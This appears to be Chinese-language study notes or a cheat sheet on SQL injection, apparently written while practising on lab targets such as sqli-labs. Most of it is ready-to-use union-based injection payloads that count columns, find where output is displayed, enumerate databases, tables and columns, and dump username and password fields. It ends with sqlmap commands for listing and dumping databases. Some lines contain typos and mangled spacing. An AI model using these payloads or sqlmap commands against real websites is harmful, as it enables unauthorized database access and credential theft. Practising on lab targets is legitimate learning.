Sql注入
Svstem user()系统用户名
user()用户名
current_user()当前用户名
session_user()连接数据库的用户名
database()数据库名
version()数据库版本
@@datadir数据库路径
@basedir数据库安装路径
@version comoile os操作系统
count()返回执行结果数量
使用?id=’ union select ‘null’,’null’,’null’,’null# 判断列数,发现有四列
4、查看回显位置:
?id=’ union select ‘1’,’2’,’3’,’4
5、?id=’ union select ‘1’,database(),user(),’4
查询表:
?id=’ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database() and ‘1’=’1
7、查询字段:
?id=’ union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=’stormgroup_member’ and ‘1’=’1
8、查询字段值
?id=’ union select 1,group_concat(name,password),3,4 from stormgroup_member where ‘1’=’1#
?id=’ union select 1,@@datadir,2–+查询根目录
order by 4 –+判断有多少列
union select 1,2,3 –+判断数据显示点
union select 1,user(),database()–+显示出登录用户和数据库名
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = ‘security’ ),3 –+ 查看数据库有哪些表
union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = ‘security’ and table_name=’users’ ),3 –+ 查看对应表有哪些列
Unionselect1,(selectgroup_concat(concat_ws(0x7e,username,password))from users),3–+ 查看账号密码信息
union注入过程:
1.order by确定列数
2.观察页面返回,选取可以显示数据的位置,进行下一步的注入
3.读库信息
4.读表信息
5.读字段
6.读数据
sqlmap:
-u “url”判断是否为注入点,查看服务器系统
-u “url” –is-dba 当前用户是否为管理员权限
-u “url” –dbs 列出所有数据库
-u “url” –current-db 当前数据库
-u “url” –current-user 当前用户 –users 所有用户
-u “url” –tables -D 数据库名
-u “url” –columns -T 表名 -D 数据库名
-u “url” –dump -C 列名 -T 表名 -D 数据库名
–is-dba
注:group_concat()
1、功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果。
2、语法:group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator ‘分隔符’] )